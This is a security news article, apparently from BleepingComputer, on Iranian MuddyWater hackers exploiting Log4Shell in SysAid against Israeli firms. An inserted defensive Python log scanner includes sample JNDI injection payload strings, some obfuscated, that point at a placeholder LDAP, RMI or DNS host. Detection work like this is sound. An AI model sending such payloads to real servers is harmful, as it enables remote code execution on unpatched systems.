
Microsoft: Iranian hackers still exploiting Log4j bugs against Israel
2022-08-26 14:31

Hackers continue to exploit the Log4j vulnerability in unpatched applications, as shown by the Iranian 'MuddyWater' threat actor, which was found targeting Israeli organizations that use the SysAid software.

The latest MuddyWater hacking campaign outlined in a Microsoft report yesterday constitutes the first example of leveraging vulnerable SysAid applications to breach corporate networks.

MuddyWater previously targeted VMware instances that carried Log4j flaws to drop web shells, but since those were presumably patched over time, the threat actors explored alternative options.

The Iranian hackers exploit Log4Shell flaws for initial access, running malicious PowerShell via a specially crafted request sent to vulnerable endpoints and dropping web shells.
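The initial-access step described above, a request carrying a JNDI lookup string sent to a Log4Shell-vulnerable endpoint, is what defenders look for in HTTP access logs. The following Python is an added example, not code from the article or from Microsoft's report: it scans constructed sample log lines for `${jndi:` lookups after undoing the URL-encoding and the `${lower:…}` / `${…:-x}` obfuscation commonly used to slip past plain string matches. The log lines, the 198.51.100.x addresses, and the `normalize` and `scan_log` names are assumptions made for the example.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the article). The first three
# carry JNDI lookup strings in progressively more obfuscated forms; the last is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Aug/2022:10:01:02 +0000] "GET /sysaid/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.6 - - [26/Aug/2022:10:01:09 +0000] "GET /login.jsp?user=${${lower:j}ndi:${lower:r}mi://198.51.100.7/x} HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.7 - - [26/Aug/2022:10:02:11 +0000] "POST /api HTTP/1.1" 200 12 "-" "%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fp%7D"
10.0.0.8 - - [26/Aug/2022:10:03:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

# ${lower:x} / ${upper:x} evaluate to x once Log4j resolves them, so strip the wrapper.
_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-x} is Log4j's default-value syntax; an undefined lookup yields x.
_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")

_JNDI = "${jndi:"


def normalize(s: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and Log4j lookup obfuscation until the string stops changing."""
    prev = None
    for _ in range(max_rounds):
        if s == prev:
            break
        prev = s
        s = urllib.parse.unquote(s)
        s = _CASE.sub(lambda m: m.group(1), s)      # innermost wrappers first; loop handles nesting
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s.lower()


def scan_log(text: str) -> list:
    """Return one hit per log line whose normalized form contains a JNDI lookup."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        norm = normalize(line)
        idx = norm.find(_JNDI)
        if idx != -1:
            hits.append({
                "line": n,
                "src": line.split(" ", 1)[0],       # client address is the first field
                "indicator": norm[idx:idx + 40],    # short excerpt for the alert
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['src']}: {hit['indicator']}")
```

The normalizer deliberately runs to a fixed point rather than a single pass, because nested wrappers such as `${${lower:j}ndi:` only collapse one layer per round; a single-pass matcher would miss them. Matching on the normalized lowercase string also catches mixed-case variants like `${JnDi:`.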

Ligolo is an open-source reverse-tunneling tool that the hackers use for securing communications between backdoors and C2 infrastructure.

While Microsoft's report doesn't go into the details of the particular tool, we know from a March 2022 report by Security Joes that the hackers added useful features like execution checks and command-line parameters.

News URL

https://www.bleepingcomputer.com/news/security/microsoft-iranian-hackers-still-exploiting-log4j-bugs-against-israel/